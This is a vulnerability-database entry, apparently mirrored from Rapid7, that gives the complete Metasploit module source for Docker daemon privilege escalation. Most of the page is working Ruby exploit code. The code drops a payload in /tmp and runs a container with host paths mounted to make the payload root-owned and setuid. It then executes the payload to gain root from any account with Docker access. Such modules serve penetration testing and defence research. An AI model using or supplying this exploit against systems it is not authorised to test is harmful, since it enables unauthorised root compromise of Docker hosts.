Docker Daemon Privilege Escalation

2016-06-28T08:24:41
ID MSF:EXPLOIT/LINUX/LOCAL/DOCKER_DAEMON_PRIVILEGE_ESCALATION
Type metasploit
Reporter Rapid7
Modified 2019-01-11T22:46:58

Description

This module obtains root privileges from any host account with access to the Docker daemon. Usually this includes accounts in the docker group.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Docker Daemon Privilege Escalation',
      'Description'    => %q{
        This module obtains root privileges from any host account with access to the
        Docker daemon. Usually this includes accounts in the `docker` group.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['forzoni'],
      'DisclosureDate' => 'Jun 28 2016',
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultTarget'  => 0
      }
    ))
    register_advanced_options([
      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    if cmd_exec('docker ps && echo true') =~ /true$/
      print_good("Docker daemon is accessible.")
      Exploit::CheckCode::Vulnerable
    else
      print_error("Failed to access Docker daemon.")
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    if nosuid? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
    end

    pl = generate_payload_exe
    exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
    print_status("Writing payload executable to '#{exe_path}'")

    write_file(exe_path, pl)
    register_file_for_cleanup(exe_path)

    print_status("Executing script to create and run docker container")
    vprint_status cmd_exec("chmod +x #{exe_path}")
    vprint_status shell_script(exe_path)
    vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")

    print_status "Waiting #{datastore['WfsDelay']}s for payload"
  end

  def shell_script(exploit_path)
    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
    dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")

    %Q{
      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
      docker rmi -f $IMG
      #{exploit_path}
    }.strip.split("\n").map(&:strip).join(';')
  end
end